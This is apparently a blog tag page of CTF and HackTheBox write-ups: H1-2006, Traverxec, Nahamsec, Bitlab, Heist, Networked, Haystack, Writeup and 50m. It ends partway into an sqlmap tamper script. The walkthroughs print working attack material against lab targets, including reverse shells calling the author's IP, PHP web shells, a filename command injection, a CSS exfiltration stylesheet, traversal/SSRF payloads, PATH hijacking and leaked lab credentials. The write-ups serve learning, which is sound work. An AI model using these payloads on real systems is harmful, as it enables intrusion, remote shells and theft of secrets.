Tag Archives: CTF

H1-2006 CTF Write-up

HackerOne recently held a CTF with the objective to hack a fictitious bounty payout application. While my write-up of this CTF is now public and can be seen here, this is a different kind of write-up where I will be more open and go into the areas where I had a lot of trouble. I’m still quite a newbie at hacking, and the CTF presented many problems for me.

Part One: Web

The only information we got for the CTF was the scope:

This is no different from hunting on a bug program, so I did the usual and fired up findomain and found all the subdomains:

https://bountypay.h1ctf.com
https://app.bountypay.h1ctf.com
https://staff.bountypay.h1ctf.com
https://api.bountypay.h1ctf.com
https://www.bountypay.h1ctf.com
https://software.bountypay.h1ctf.com

I then used ffuf to look for interesting subdirectories and files on all the subdomains and found this: https://app.bountypay.h1ctf.com/.git
A git repository was hidden on the app subdomain, and I queried the usual files included in a git repo: HEAD and config.
Config pointed to the ‘real’ repository on GitHub where I found an interesting file mentioning a server log named bp_web_trace.log. Going to this log gave me a base64 hashed string that decoded to this:

{"IP":"192.168.1.1","URI":"\/","METHOD":"GET","PARAMS":{"GET":[],"POST":[]}}
{"IP":"192.168.1.1","URI":"\/","METHOD":"POST","PARAMS":{"GET":[],"POST":{"username":"brian.oliver","password":"V7h0inzX"}}}
{"IP":"192.168.1.1","URI":"\/","METHOD":"POST","PARAMS":{"GET":[],"POST":{"username":"brian.oliver","password":"V7h0inzX","challenge_answer":"bD83Jk27dQ"}}}
{"IP":"192.168.1.1","URI":"\/statements","METHOD":"GET","PARAMS":{"GET":{"month":"04","year":"2020"},"POST":[]}}

As can be seen, these are server entry logs for a user logging in, and include username (brian.oliver), password (V7h0inzX) and a challenge answer (bD83Jk27dQ).

Using these credentials I logged in to app.bountypay.h1ctf.com and used the challenge answer to try and bypass the 2-factor authentication (2FA). It didn’t work though. Either this answer had expired or just wasn’t valid.
Looking in the source code for the 2FA page I found a challenge_value, a 32 character long string that looked a lot like an MD5 hash. I put this in hashcat to try and bruteforce it, but got no result. Thinking about it a little more, I wondered if the challenge_value was the MD5 sum of the challenge_answer from above, but no, that didn’t work either. I then tried replacing the challenge_value with the MD5 sum of the answer I had and sent this instead of the original challenge_value, hoping the server didn’t remember which challenge it sent. It worked! I had bypassed the 2FA.

I was now presented with the BountyPay Dashboard where I could load transactions, however all the entries were empty. Looking at the requests made I saw it queried the API subdomain, but trying to query that directly got “Missing or invalid token”. So everything had to go through the dashboard where I was authenticated.

An example reply from a Dashboard request

I started playing with the cookie which was a base64 encoded JSON string:

{"account_id":"Ae8iJLkn9z","hash":"de235bffd23df6995ad4e0930baac1a2"}

Notice how the account_id is also reflected in the API url in the screenshot above. After trying SQL injection in this value I tried a simple Path Traversal Ae8iJLkn9z../Ae8iJLkn9z – with this the API path stayed the same, indicating a possible Path Traversal vulnerability.
I tried getting ../../../../../etc/passwd but that didn’t work. Experimenting a bit more I understood that I could only query files within the web root, not outside. Getting ../../../index.html worked. Going back to the landing page of https://api.bountypay.h1ctf.com I looked again at the redirect function there.
When first I started the CTF I had tried redirecting to different pages and noticed that only www.google.com and *.bountypay.h1.ctf.com were allowed. One of those, software.bountypay.h1ctf.com, presented a 401 Unauthorized message if I visited it:

Thinking that since this page was blocked from remote IPs, maybe I could access it via the Path Traversal I just found: effectively an SSRF:

{"account_id":"Ae8iJLkn9z/../../../redirect?url=https://software.bountypay.h1ctf.com/#","hash":"de235bffd23df6995ad4e0930baac1a2"}

Notice how I had to include a hashtag (#) after the URL. At first the redirect didn’t work, I just got 404 Not Found. Then I noticed how the API URL included /statements?month=01&year=2020 which I needed to get rid of. The hashtag does that since the server will ignore everything after it.

I now had access to the software subdomain and was presented with a login form. This required a POST request which I couldn’t really think of any way to accomplish via SSRF. Sending a GET request with credentials didn’t work, so I got stuck here. After a pause and a walk I decided to try and fuzz the subdomain and wrote this quick script to do it (I later learned Burp Intruder could have done it for me using Payload Processing):

import requests
import base64
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = 'https://app.bountypay.h1ctf.com/statements?month=01&year=2020'
proxies = {"https":"https://127.0.0.1:8080"}
wordlist = "wordlist.txt"
fd = open(wordlist, "r")
endpoints = fd.readlines()
fd.close()

# create cookie
for endpoint in endpoints: 
    endpoint = endpoint.rstrip()
    cookie = '{"account_id":"F8gHiqSdpK/../../../redirect?url=https://software.bountypay.h1ctf.com/' + endpoint + '#","hash":"de235bffd23df6995ad4e0930baac1a2"}'
    encodedCookie = base64.b64encode(cookie.encode("utf-8"))
    cookies = {"token":encodedCookie.decode("utf-8")}
    # Send request
    r = requests.get(url, cookies=cookies, proxies=proxies, verify=False)
    # Filter responses
    if not "404 Not Found" in r.text:
        print(endpoint + " did not return 404!")

Within a few minutes I had found the endpoint uploads/ and I could now grab the BountyPay.apk file:

Part Two: Mobile

Mobile hacking is something I always tell myself I want to learn, but never have time to do. While I have written a few small mobile applications using Android Studio this is pretty much the extent of my knowledge, so this next part was not easy for me.
To start with, a recent update to my Gentoo Linux desktop had broken the Android Studio virtual device manager, so I had to sort that out first. This took me a few hours but I was finally able to run the BountyPay application. In the meantime I decompiled the code using jadx-gui and took a look at the main functions. I learned that the application was separated into 3 ‘activities’ that required different actions (URLs) to accomplish.
I tried calling these functions directly in the Virtual Device using Intents, but didn’t have any success – most likely because I don’t know how.
I Googled around and found a few instructions on how to control an Android application directly using adb, something I have used a couple times in the past to either root or unbrick a device.
With a little more Googling (actually I use DuckDuckGo…) I learned that using am start I could run the Intents I was trying to get to work.
With a little help from a fellow hacker I was able to complete the first activity using:

am start -a android.intent.action.VIEW -d "one://part?start=PartTwoActivity"

I then looked at the decompiled code for how to pass the next activity and contructed a query to launch it.

String firstParam = data.getQueryParameter("two");
String secondParam = data.getQueryParameter("switch");
if (firstParam != null && firstParam.equals("light") &&
secondParam != null && secondParam.equals("on"))
am start -a android.intent.action.VIEW -d "two://part?two=light&switch=on"

The last activity required 3 parameters, two of which should be base64 encoded:

        if (getIntent() != null && getIntent().getData() != null) {
            Uri data = getIntent().getData();
            String firstParam = data.getQueryParameter("three");
            String secondParam = data.getQueryParameter("switch");
            String thirdParam = data.getQueryParameter("header");
            byte[] decodeFirstParam = Base64.decode(firstParam, 0);
            byte[] decodeSecondParam = Base64.decode(secondParam, 0);
            final String decodedFirstParam = new String(decodeFirstParam, StandardCharsets.UTF_8);
            final String decodedSecondParam = new String(decodeSecondParam, StandardCharsets.UTF_8);
            C04185 r17 = r0;
            DatabaseReference databaseReference = this.childRefThree;
            byte[] bArr = decodeSecondParam;
            final String str = firstParam;
            byte[] bArr2 = decodeFirstParam;
            final String str2 = secondParam;
            String str3 = secondParam;
            final String secondParam2 = thirdParam;
            String str4 = firstParam;
            final EditText editText2 = editText;
            Uri uri = data;
            final Button button2 = button;
            C04185 r0 = new ValueEventListener() {
                public void onDataChange(DataSnapshot dataSnapshot) {
                    String str;
                    String value = (String) dataSnapshot.getValue();
                    if (str != null && decodedFirstParam.equals("PartThreeActivity") && str2 != null && decodedSecondParam.equals("on") && (str = secondParam2) != null) {
                        if (str.equals("X-" + value)) {
                            editText2.setVisibility(0);
                            button2.setVisibility(0);
                            PartThreeActivity.this.thread.start();}}}

I had a lot of trouble with this step. First, the value of the header was hard to identify in the code. I tried several before hitting upon the correct one, ‘Token’. Second, I was unsure what to do with the equal signs in the base64 string. If I omitted them, the string wasn’t accepted. If I left them in, the application either crashed or went back to the second activity, but this wasn’t very reliable. URL-encoding the equal signs worked however and I was able to complete the third activity.

am start -a android.intent.action.VIEW -d
"three://part?three=UGFydFRocmVlQWN0aXZpdHk%3D\&switch=b24%3D\&header=X-Token"

Now I noticed in the attached logger (Android Studio attaches one by default) that the application printed an X-Token. The application asked me to verify it and I pasted it in and was presented with a ‘Congrats Activity’. Mobile challenge completed!

Part Three: Privesc

With the above X-Token I now had full access to api.bounty-h1ctf.com and could query the API. The /api/staff endpoint listed all the current staff, and I found out that by POSTing to this endpoint gave this error message :
409 Conflict “Staff Member already has an account”
I needed a new staff ID to create a new member, but didn’t have any luck brute forcing this value. Luckily HackerOne had posted an official hint on Twitter that showed the ID badge of a new hire, including a staff ID. I was able to create a new member with this ID and now had access to the staff portal.

The staff portal was a relatively simple application with little functionality, so it didn’t take long to go through it. After some time I found these 4 interesting vulnerabilities / hints:

  • The JavaScript file website.js referred to 2 interesting functions: upgradeToAdmin and a report URL, plus #tab{1,4} which were queried in the location hash.
  • Using the parameter username I could populate the login screen like this: https://staff.bountypay.h1ctf.com/?template=login&username=sandra.allison
  • Using arrays, I was able to chain templates together in the same site like this: https://staff.bountypay.h1ctf.com/?template[]=login&template[]=ticket&ticket_id=3582
  • There was an injection in the upgrade avatar functionality, but any non-alphanumerics were stripped away.

And this is where I got stuck. I tried SSRF in the report URL function but couldn’t get it to work. I also tried using the text injection in the avatar to get XSS, but without using special characters this was pretty much impossible. I didn’t see any way forward.

Instead of working on this alone I did the most important thing a hacker can do: collaborated. With the help of others I was able to put the above 4 things together and get a working exploit. One of the steps was completely new to me, and I still don’t understand it completely: definitely a technique I have to study more.

Turns out there exists something called “Event Bubbling”, where by passing one JavaScript event together with another associated function, causes them both to execute. In our case, if I could chain the tab1 function together with upgradeToAdmin, this second function would also execute.
Tab1 could be executed from the location.hash so I needed to specify this in the URL and then pass it to an admin so they could execute the upgradeToAdmin function. This function needed a username, but I already knew how to parse that with a parameter in the login template.
The avatar where I’d include the tab1 and upgradeToAdmin only showed on the ticket template page with a valid ticket_id, so I needed all these templates chained together:
https://staff.bountypay.h1ctf.com/?template[]=login&username=sandra.allison&template[]=ticket&ticket_id=3582#tab1
This URL had everything needed and I just had to send it to the admin via the report URL function.

I reported the URL and then reloaded the staff portal. I noticed that a new tab had appeared called ‘admin’ – my exploit had worked, and I now had admin privileges!
Going the the admin page I found login credentials for Mårten Mickos, the CEO of HackerOne.

Part Four: 2FA Again

Mårten’s login credentials worked on app.bountypay.h1ctf.com, which again required me to bypass the same MD5 2FA challenge as before.
I was now able to see a transaction on the dashboard, apparently this was the bounties that had yet to be paid, totalling 210.300$.

Clicking ‘Pay’ lead to yet another 2FA which appeared to be the same as before so I again pasted the MD5 hash I had already used twice and expected to pass the 2FA. But of course it wouldn’t be so easy (it never is!).
Inspecting the 2FA I saw that loading the challenge made the browser send a POST request with a link to a CSS file via the app_style parameter.

Whenever a request includes a full link to a resource from another domain, this is a good sign of a vulnerability since an attacker can control this request. Pointing the app_style value to a webhook request worked and I could see the traffic from the BountyPay app.

Next step was to host a malicious CSS file on a server I control. However I discovered that the app would only contact secure HTTP domains, and my home server is not HTTPS. I needed another server with a valid certificate, and the only one I had was the one you’re reading this one. I probably broke several points of the TOS by temporarily hosting a CSS here…

To check that my hosted CSS worked I copied the default one and changed the background colour. However I didn’t see any change on the next page, so this was not where the CSS was used. This confused me, because where else would the CSS be used if not client-side? Again my collaborators helped me seeing the light and hinted that this was used server-side where the 2FA answers would be seen. They guided me to this blog post which explains how to do a CSS exfiltration attack.

The attack works like this: I already knew that the 2FA code would be up to 7 characters long (the 2FA only allowed for 7 characters to be input), and I worked on the assumption that these characters would be shown server-side where my CSS file was included. I didn’t know if the code was only letters, numbers, symbols or a combination of all.
So I queried each letter successively for each character of the 2FA code box. If the queried letter was the same as in the box, the CSS fetched a background-image from a server under my control (luckily I could use non-secure HTTP here). If not, it would proceed to the next letter.

On the first run I saw 5-6 characters randomly in my server log. So there were two further issues to solve: apparently some traffic got lost (or maybe some codes were only 5-6 characters long?), and I needed to be able to identify the sequence of the characters in the code. AABBAAA is not the same as BAAAAAB. I solved the first problem by running the attack several times until I had all 7 characters, and the second problem by appending a parameter to the background image URL.

I now had a working CSS attack (only the first few lines are shown, the full script is almost 500 lines long):

input[value=A]:nth-of-type(1) { background-image: url("http://almadjus.duckdns.org/data?1=A"); }
input[value=B]:nth-of-type(1) { background-image: url("http://almadjus.duckdns.org/data?1=B"); }
input[value=C]:nth-of-type(1) { background-image: url("http://almadjus.duckdns.org/data?1=C"); }
input[value=D]:nth-of-type(1) { background-image: url("http://almadjus.duckdns.org/data?1=D"); }
input[value=E]:nth-of-type(1) { background-image: url("http://almadjus.duckdns.org/data?1=E"); }
input[value=F]:nth-of-type(1) { background-image: url("http://almadjus.duckdns.org/data?1=F"); }

After a couple runs my server log had this:

The characters are out of order by easy to identify by the /data?n= parameter

Sending pBxUwRP as the 2FA answer was accepted and I had solved the CTF!

Final Words

The biggest thing I (once again) learned from this CTF is this: collaboration is the most important thing in hacking! One hacker can do much, but several working together can do wonders.
I want to once again thank @pirateducky, @simone_bovi, @fersingb and @GameritedYT for their invaluable help – together we hit harder!

HackTheBox Traverxec

Traverxec is rated as an easy box on HackTheBox.

User

As with all HackTheBox machines I started with an nmap scan which identified port 80 was open and running nostromo 1.9.6, a simple HTTP server also called nhttpd.

While searching for some information on nostromo, pretty much the first search result was about a known vulnerability. I quickly found an exploit for it here. The exploit is basically a directory traversal vulnerability with remote command execution, hence the box name Traverxec.
The exploit makes a POST request for /bin/sh, which is then used to execute arbitrary commands.

Using the above exploit script I poked around the box and found an .htpasswd file in the nostromo server directory:

./exploit.sh 10.10.10.165 80 cat /var/nostromo/conf/.htpasswd

Copying the hash from that file I cracked it with hashcat on my host machine:

hashcat --opencl-platforms=1 --username -m 500 -a 0 -w 3 hash /usr/share/wordlists/rockyou.txt

I now had the first pair of credentials:

david:Nowonly4me

Hoping those were the credentials to login via SSH I tried doing that, but no. Apparently they were for something else so I went back to poking in the box.

At this point it started to get a little cumbersome to use the above exploit script for every command, so I used it to make a reverse Netcat shell to my machine:

./exploit.sh 10.10.10.165 80 nc -e /bin/sh 10.10.14.157 9001

For the next part I had to look closely at the nhttpd file where I found the .htpasswd in the beginning. This file was configured to serve the home directory of david as well as the directory public_www. While I was able to visit http://10.10.10.165/~david there was nothing interesting there, and the permissions of /home/david did not allow for reading files. Something was amiss though, as I had execute rights on that folder, so I could cd into it but not run ls on it. After looking at the usual files (.bashrc etc) in that folder, I tried going to /home/david/public_www. This worked, and I was able to use ls here and find a backup file. This backup file contained a private SSH keyfile which I transferred to my host machine and cracked with john.
Finally I had a pair of credentials to SSH into the machine and grab the user.txt.

Root

In the home dir I found a folder called /bin which contained this file: ./server-status.sh
Running it showed some information of the processes running on the box, and looking at the last line of the script revealed that the last command was run with sudo.
Looking up the command (journalctl) on GTFObin revealed how one could escape the current environment and get a shell with !/bin/sh. This did not work from within the script, but running the last part of the script manually from terminal worked (omitting the pipe into cat ¦ /usr/bin/cat) and I had a root shell due to the use of password-less sudo for the journalctl command.
With this I could read root.txt and the box was pwned.

Nahamsec CTF write-up

Nahamsec recently created a CTF when he reached 30k Twitter followers. The only information he gave was here, so there wasn’t really much to go on. This is my write-up; I decided to send my write-up like a bug report. This style of course does not tell the time wasted looking in all the wrong spots, like doing steganography on the JPEG in the above link, or digging on all the wrong server/endpoints.

—————————————————————————————————–

Hello ,
I’ve found a sensitive information disclosure in the API running on http://api-admin.nahamsec.net. Using leaked credentials I was able to access the secret ‘flag’ variable which is obviously a huge risk.

Steps to reproduce

1) Go to https://censys.io/certificates and search for nahamsec.net’ which shows the following certificate: https://censys.io/certificates/2e693fc043379439aeadcce1a9ace91f70e707de616f434215c2010252315098
Notice how it’s valid for the subdomain 30kftw.nahamsec.com

2) Go to http://30kftw.nahamsec.net/ (not https!). The admin area is only allowed from the intranet, but this is easily bypassed by using the X-Forwarded-For header with the correct endpoint, like this:

GET /admin/ HTTP/1.1
Host: 30kftw.nahamsec.net
X-Forwarded-For: 127.0.0.1

Which gives the following reply:
‘Oh!, looks like we have moved our api services to api-admin.nahamsec.net’

3) Go http://api-admin.nahamsec.net which returns 404 Not Found.

4) Go to https://github.com/garagosy/nahamsecCTF2020/blob/master/api.py
There are 2 issues here: First, the api.py leaks full credentials, and second, going to the past commit #4a0dc54 leaks the path: doc=’/swagger’. Note down both.

5) Go back to http://api-admin.nahamsec.net/swagger (the path from step 4). We now have access to the top secret Get_Flag API.
Initially both API endpoints return 500 Internal Server Error, but /api/getflag also accepts GET requests, which return Unauthorized Access with this header:
WWW-Authenticate: Basic realm=”Authentication Required”
Meaning the endpoint expects HTTP authentication.

6)
Make the following Curl request to the API endpoint from step 5 (with the credentials from step 4):

curl -u BugHunters:4dawin -X GET "http://api-admin.nahamsec.net/api/getflag" -H  
"accept: application/json"

Result:

{  "Flag_is": "You are such a guru!, send this to winner@nahamsec.dev" 
}

Impact

Exposure of the secret Flag variable which can spell untold disaster for your company.

Remediation

1) http://30kftw.nahamsec.net/admin/ should not allow bypassing via the X-Forwarded-For header.
2) Remove credentials and path leak at https://github.com/garagosy/nahamsecCTF2020/

HackTheBox Bitlab

Bitlab is rated as a medium box on HackTheBox.

User

As is usual with HackTheBox, I started with an nmap scan and discovered ports 22 and 80 open. Going to the web server on port 80 and looking around, I found an interesting link under ‘help’ that wouldn’t open. Turned out the link was this JavaScript snippet:

javascript:(function(){%20var%20_0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document_0x4b18[2][_0x4b18[0]]=%20_0x4b18[3];document_0x4b18[2][_0x4b18[0]]=%20_0x4b18[5];%20})()

Cleaning up the code a little and changing the hex to ASCII, I got this:

javascript:(function(){ var __0x4b18="value","user_login","getElementById","clave","user_password",11des0081x";document[_0x4b18[2][_0x4b18[0]]= _0x4b18[5]; })()

Giving me a username and password, supposedly for the bitlab site I was on.
Login in with these credentials worked and I was able to access 2 different gitlab repositories, one of which allowed me to upload files.
Since the server was running php I tried uploading a simple php reverse shell:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.194/9123 0>&1'"); ?>

And of course starting a netcat listener on that port.

Now the problem was where to find this file and execute it, and I wasted a long time on this step. Finally I thought to look under ‘/profile’ which seemed different than the rest of the site, and finally found my script and was able to execute it.
With this I now had a shell on the machine as ‘www-data’.

As often happens with HackTheBox machines I couldn’t really do that much with the initial shell and needed to escalate to another user. Apart from root there was only one other user on the box, called ‘clave’, but after spending a long time enumerating the box I didn’t find any obvious way to escalate.

I did notice that www-data was allowed to run ‘/usr/bin/git pull’ as sudo, and I spent considerable time trying to abuse this, with no success.

Going back to the web server I did some more enumeration to see if I’d missed something. I found a code snippet on the server with a postgresql connection command including database username and password. Expanding upon this code snippet I wrote some php code to extract information from the database:

<?php
    $db_connection = pg_connect("host=localhost dbname=profiles       
        user=profiles password=profiles");
    $result = pg_query($db_connection, "SELECT * FROM profiles");
    while ($row = pg_fetch_row($result)) {
        echo "$row[0] - $row[1] - $row[2]";
    }
?>

Running this code the same way as for the initial shell, I succeeded in extracting a username and password from the database itself:

I first base64 decoded the hash which resulted in this: ‘ssh-str0ng-p@ss’ thinking that was the password, but it didn’t work. Trying the password without decoding however did work, so I guess that was a way for the box maker to troll us.

Using ssh to log into the box as clave, I was able to get user.txt.

Root

After logging in as clave, I immediately noticed a Windows binary in the home folder. I downloaded this to my machine with scp:

scp clave@10.10.10.114:/home/clave/RemoteConnection.exe ./

After spending way too much time trying to run and reverse engineer the binary using a Windows 7 virtual machine I gave up and used wine with Kali instead.
Using ollydbg, a free binary debugger, I set breakpoints on the functions with these notes:
GetUserNameW
UNICODE “clave”
Then, stepping through the program, at the second breakpoint I looked at the EAX register which contained a command to ssh with a password.

Using this password I could ssh into the box as root and get root.txt.

HackTheBox Heist

Heist is an easy Windows box on HackTheBox, however since I have very little experience with Windows, I found it rather difficult.

User

The usual nmap scan reveals the following ports are open:

Port 80 presents a login page and a forgotten password link (/issues.php), which actually goes to a forum post with an attached file containing 3 hashed passwords. These can be cracked with hashcat or for the Type 7 hashes, with this page: http://ibeast.com/tools/CiscoPassword/index.asp

Two usernames can also be found in the above config file, and a third can be found on the forum page (Hazard). Using lookupsid.py from Impacket and trying all combinations of logins gets us a few more usernames on the box.

lookupsid.py hazard:stealth1agent@10.10.10.149

Next, use auxiliary/scanner/winrm/winrm_login from Metasploit to check those usernames/passwords – or check them manually if you are not lazy like me ;-)

We now have another set of valid credentials which we can use to login via Windows Remote Management on port 5985. For this I used evil-winrm which gives a Powershell on the machine.

  ruby evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

And with that we have the user.txt.

Root

For root, we check Get-Process to see that firefox is running, something not very usual on a server, even less a HackTheBox machine.
The way to get root on this box is by making a dump of the firefox process and looking through it for any kind of login information or passwords.

First we get procdump64.exe from Windows Sysinternals and serve it on our attacker machine, and then download it on the box:

(New-Object Net.WebClient).DownloadFile("http://10.10.15.211:8000/procdump64.exe", "C:\Users\chase\Documents\procdump64.exe")

And run it on the firefox process by finding firefox’s PID:

 .\procdump64.exe -accepteula -ma PID

(-accepteula is only necessary the first time you run it).

This will create a rather large dump file (400MB+) that can be a pain to sift through. There are a few ways to do that, I’ll detail two of them here. First is to download the file to our attacker box and use strings on it (evil-winrm has a built-in download function) and grepping for ‘password’.

The second and faster way is to download strings64.exe from Windows Sysinternals and running it on the box with:

./strings64.exe -accepteula firefox.exe.dmp | % { if($_ -match "password") {echo $_} }

| % { if($_ -match “password”) {echo $_} } is the Windows Powershell way of running grep. Linux is so much easier…
It is also possible to use this command to grep: sls password ./firefox.exe.dmp -ca, but I found the screen to scroll by too fast to actually find the password, and the frame buffer too small so I couldn’t scroll that far back.

Finally with our new password we can login as administrator with evil-winrm and get root.txt.

All in all it’s a rather easy and quick machine if you know what you’re doing. I didn’t, and needed hints on the HTB forum several times. But I did learn a lot about Windows enumeration and exploitation, which should make future Windows machines just a little easier.

HackTheBox Networked

‘Networked’ is rated as an easy machine on HackTheBox

User

The usual nmap scan revealed the following open ports:

Running gobuster on port 80 revealed a few endpoints, the most interesting one being /backup which had a tarred backup file which included all the PHP files the server was running on port 80. Running those files in a local server revealed how the file upload process in /upload.php worked, and how to bypass the file type restriction by naming the uploaded file shell.php.png
With this, I was able to upload a PHP reverse shell on the live machine:

<?php system($_GET['cmd']); ?>

and I had the initial foothold.

Unfortunately there wasn’t much I could do as this user, so it was time to escalate to the other user on the box, ‘Guly’. In that user’s home folder I found a script that periodically went through all files in /var/www/html/uploads and acted on the filename of any files there. Since there was no sanitising of the input to the script, creating a file containing a bash pipe character as filename would allow me to break out of the current command, and run arbitrary commands. Creating such a file can be a little tricky, but using quotes allowed me to escape the pipe character and create the following file:

touch  '; nc -nv 10.10.14.103 9001 -c bash;'

When the script parses this file, the ; causes it to end the current command and then run netcat, creating a reverse shell to my machine.
As ‘Guly’, I could now read user.txt.

Root

Running ‘sudo -l’ as ‘Guly’ revealed that I could run a script called changename.sh password-less. Playing around with this script, which appeared to allow renaming of a network adapter, I found out that every input after ‘space’ got interpreted as a command. However, the script blacklisted most symbols including dots, meaning I couldn’t just use ‘cat /root/root.txt’. Nor would the usual bash reverse shell work, as it expects the IP address as the usual xxx.xxx.xxx.xxx.

Here’s a little-known feature of Netcat: instead of using the usual IP notation, it also accepts it in Hex. Using an online calculator, I translated my IP to Hex and introduced the following command in changename.sh:

pleaseconnectmetothisaddress nc -e /bin/sh 0x0A0A0E67 9001

The silly first part was required because the command didn’t get interpreted until after the first space.
Now I had a reverse root shell, and could read root.txt.

HackTheBox Haystack

‘Haystack’ is rated as an easy machine on HackTheBox.

USER

Running nmap on the machine showed that only a few ports were open, with http running on both port 80 and 9200.

Visiting port 80 revealed a very simple page with an image and nothing else. Gobuster didn’t reveal any other endpoints on this port, so obviously the image was important.

Running steghide on the image didn’t reveal anything, but strings did, namely a base64 string that translated to a Spanish sentence:

la aguja en el pajar es "clave"

Meaning “The needle in the hay is ‘key'”, where ‘key’ can also mean ‘password’. Trying to extract more information from the image with steghide and the ‘key’ from above didn’t result in anything.

Since there was nothing else on port 80, I proceeded to look at port 9200.
This presented an Elastiksearch portal, and Duckduckgo’ing this technology I was able to construct a search query:

http://10.10.10.115:9200/_search?pretty&size=200

This query revealed that the database contained bank account information and quotes… Strange combination! Looking through both and narrowing the search by using the keywords found in the image earlier, I came upon some interesting stuff (that would never have been there in a real-world database!):

POST /quotes/_search?pretty
Host: 10.10.10.115:9200
Content-Type: application/json
Content-Length: 79

{
   "query":{
      "query_string":{
         "query":"clave"
      }
   }
}

This revealed two base64’d hashes that included a username and password. With these I could SSH into the box and grab the user.txt.

ROOT

Apart from grabbing the user flag there wasn’t really much else I could do as this user, so I instead tried to escalate to the other user on the system, ‘kibana’.
Luckily there exists a known LFI (Local File Exclusion) vulnerability in Kibana, the software that is part of the Elastiksearch stack. The exploit is pretty straight-forward, create a file on the local machine and make a GET request from the local machine to execute it.

I created a node.js reverse shell and put it in /tmp:

(function(){
        var net = require("net"),
            cp = require("child_process"),
            sh = cp.spawn("/bin/sh", []);
        var client = new net.Socket();
        client.connect(9001, "10.10.15.9", function(){
            client.pipe(sh.stdin);
            sh.stdout.pipe(client);
            sh.stderr.pipe(client);
        });
        return /a/; // Prevents the Node.js application from crashing
})();

And then set up a Netcat listener on my attack box and executed the reverse shell via Curl on the server:

http://localhost:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/shell.js

As the ‘kibana’ user I was able to read the /etc/logstash/conf.d/ directory which contained configuration files for logstash, a process running as root which I had identified earlier with LinEnum.sh.

The most interesting file in the above directory was filter.conf, which explains how logstash greps a file and which parts it executes:

filter {
    if [type] == "execute" {
        grok {
            match => { "message" => 
"Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
        }
    }
}

Meaning, logstash looks for the string Ejecutar comando : and executes everything after it (the part after GREEDYDATA. There are several blogs on the Internet explaining this, search for ‘grok’ and ‘greedydata’).
With this in mind I created the file /opt/kibana/logstash_x with a reverse bash shell:

Ejecutar comando : bash -i >& /dev/tcp/10.10.15.9/9001 0>&1

And finally I got a connection on the Netcat listener and was logged in as root and could grab the root flag.

HackTheBox Writeup

‘Writeup’ is rated as an easy machine on HackTheBox.

User

As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).

Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.

Fortunately, checking robots.txt gave me something to work on, as it didn’t want me to visit /writeup. Which is exactly what I did!
There wasn’t much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as ‘CMS Made Simple’. Something which exploit-db has several exploits for.
I found an SQL injection exploit which didn’t need any valid credentials, and since I wasn’t able to identify the version of CMS Made Simple running, I decided to give it a try.

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password ‘raykayjay9’ which allowed me to log in via SSH and grab the user flag.

Root

For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without a specific path, looking in the following dirs in the PATH variable:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called ‘run-parts’ into either of the above dirs?

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1

Running chmod +x to make the above script executable and starting a reverse netcat listener

nc -lvnp 9001

All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!

50m CTF write-up

On the 26th of February HackerOne announced ‘the biggest, the baddest, the warmest’ CTF, with an incredible price of 10.000 US$. Being a beginner hacker my first reaction was: ‘with that kind of price, I’ve no chance in hell to solve it!’. However, since I love playing CTFs I took a shot anyway. This is my write-up of the CTF, which I unfortunately was unable to solve due to both lack of time and lack of experience. I did however, get much further than I would have ever dreamed.

Step 1

The tweet included two PNG pictures and no hint on what to do. I’d recently done another CTF by Intigriti which also included a picture, and reasoned that steganography had to be involved. Running steghide on the image didn’t help, since it didn’t support PNGs. Neither did hexdump nor messing with the picture in Gimp. I then went and searched Duckduckgo for ‘png hidden stego’ and came upon a tool for extracting information from PNGs, namely zsteg. Running through the examples in their readme I was able to extract a link with the following command:

./zsteg D0XoThpW0AE2r8S.png -b 1 -o yx -v

Visiting the link led to a Google Drive box with a single file, an Android APK.

Step 2

First thing I did was load the APK in Android Studio and run it in a VM. It presented me with a clean login interface and nothing else. I tried a few username/password combos and intercepted the traffic in Burp. Turned out both the request and reply were encrypted.

Digging through the java code using jd-gui I could see that the app was using AES-256-CBC to encrypt and decrypt, and the key was even hardcoded!

After a couple unfruitful days trying to decrypt the payloads using OpenSSL I gave up and threw together a python script, which luckily was a lot easier that I expected. With this script I was able to both see and tamper with the requests the app sent. I tried bruteforcing the login credentials which was surprisingly easy: username: admin, password: password! Thinking I’d solved this step I logged in and was presented with a thermostat that allowed me to change the temperature somewhere… And nothing else. Apparently a dead end!

I continued to tamper with the payloads and discovered that by including a single quote in the username I could provoke a different error message from the server. Using two single quotes did not give an error. Great! Apparently the username was vulnerable to SQL injection!

Exploiting this injection manually seemed pretty daunting, so I looked to sqlmap. One problem though: I needed to encrypt every payload sent by sqlmap for the server to understand it. Luckily sqlmap has an option called ‘tamper’, which runs every payload through a python script. I looked through the included scripts but none of them did what I needed, so I wrote a new one using the code I wrote for manually tampering with the payloads. The result was this:

 #!/usr/bin/env python3.6

""" For use in sqlmap as tamper script.
Encrypts payload using AES-CBC, then base64 and finally URL-encodes
chars. """

import base64
import hashlib
from Crypto.Cipher import AES
from Crypto import Random
